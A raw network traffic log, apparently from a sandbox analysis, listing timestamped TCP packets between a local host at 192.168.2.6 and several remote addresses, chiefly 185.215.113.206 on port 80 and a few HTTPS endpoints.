Nov 26, 2024 00:25:41.985570908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.985574007 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.985678911 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.986756086 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.986839056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.986893892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.987051964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.987972975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.988044024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.988080978 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.988080978 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.989228964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.989275932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.989506960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.989572048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.990458012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.990519047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.990576029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.990623951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.991658926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.991714954 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.991740942 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.991837025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.992875099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.992952108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.993155956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.993221045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.994049072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.994163036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.994201899 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.994201899 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.995359898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.995460987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.995511055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.996519089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.996589899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.996620893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.996648073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.997761965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.997811079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.997872114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.997967958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.998987913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.999043941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:41.999141932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:41.999341965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.000179052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.000236988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.000273943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.000335932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.001410961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.001462936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.001737118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.001786947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.002481937 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002499104 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002516031 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002525091 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002537966 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:42.002562046 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002578974 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:42.002610922 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.002753973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.002765894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.002773046 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:42.002798080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.002824068 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.003937006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.003950119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.003983974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.004015923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.004292011 CET	49841	443	192.168.2.6	152.195.19.97
Nov 26, 2024 00:25:42.004308939 CET	443	49841	152.195.19.97	192.168.2.6
Nov 26, 2024 00:25:42.005059958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.005117893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.005306005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.005405903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.006418943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.006468058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.006504059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.006619930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.007570982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.007591963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.007635117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.007648945 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.007658958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.008771896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.008785009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.008851051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.010557890 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.010683060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.010694981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.010874987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.011362076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.011374950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.011435032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.012346029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.012413025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.012511969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.013138056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.013710976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.013731003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.013777018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.013818026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.014792919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.014929056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.015016079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.015074968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.016002893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.016108990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.016123056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.016155958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.017395973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.017409086 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.017452955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.017501116 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.018568993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.018580914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.018624067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.018650055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.019814014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.019825935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.019862890 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.019887924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.020934105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.020972013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.021008968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.021034002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.022147894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.022216082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.022310972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.022351980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.023354053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.023411989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.023632050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.023683071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.024682999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.024703026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.024756908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.025784969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.025866985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.025881052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.026015043 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.027023077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.027086973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.027193069 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.027241945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.028235912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.028300047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.028316975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.028347015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.029500008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.029510975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.029562950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.030709028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.030764103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.031095028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.031151056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.031893969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.031948090 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.032052994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.032124043 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.033138990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.033199072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.059602022 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.059858084 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.059880018 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.060986042 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.061048985 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.061613083 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.061681032 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.061839104 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.061846018 CET	443	49842	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.091236115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.133040905 CET	49842	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.212888002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.347029924 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.348017931 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.348040104 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.348768950 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.348774910 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398408890 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398444891 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398453951 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398467064 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398489952 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398498058 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398504972 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.398531914 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.398549080 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.398569107 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.426543951 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.426582098 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:42.426646948 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.426736116 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.426776886 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:42.427201986 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.428678989 CET	49849	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.428692102 CET	443	49849	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:42.428850889 CET	49850	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:42.428878069 CET	443	49850	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:42.474128008 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.475250006 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.475265980 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.475980043 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.475986004 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.477946997 CET	443	49845	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.478348970 CET	49845	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.478373051 CET	443	49845	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.478960991 CET	49845	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.478969097 CET	443	49845	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.540069103 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.540184975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.540263891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.540467978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.540594101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.540652037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.541739941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.541791916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.541851044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.542912960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.542989016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.543060064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.544142962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.544482946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.544543028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.545296907 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.545361042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.545397043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.545530081 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.546581030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.546592951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.546686888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.546686888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.547754049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.547806025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.547990084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.548039913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.549014091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.549132109 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.549191952 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.550276041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.550287962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.550379992 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.551516056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.551527977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.551582098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.552638054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.552690029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.552730083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.553524017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.553873062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.553886890 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.553925037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.555075884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.555172920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.555228949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.556283951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.556472063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.556504965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.556539059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.557554960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.557866096 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.557921886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.558729887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.558780909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.558825970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.560000896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.560014009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.560050011 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.560070992 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.561153889 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.561201096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.561321020 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.561363935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.562386036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.562438965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.562484026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.562544107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.563667059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.563680887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.563723087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.564894915 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.564909935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.564966917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.566019058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.566168070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.566230059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.567274094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.567346096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.567361116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.568509102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.568567991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.568608999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.569534063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.569956064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.569968939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.570012093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.570923090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.570976019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.571017981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.571130991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.572148085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.572160006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.572242975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.573420048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.573432922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.573492050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.574609995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.574662924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.574670076 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.575813055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.575862885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.575923920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.575989962 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.576092005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.577050924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.577100039 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.577151060 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.578444958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.578457117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.578500032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.578535080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.579487085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.579535007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.579682112 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.579725981 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.580679893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.580728054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.580773115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.580811977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.581429958 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.581445932 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.581470966 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.581515074 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.581515074 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.581537008 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.581548929 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.581574917 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.581928968 CET	80	49795	185.215.113.206	192.168.2.6
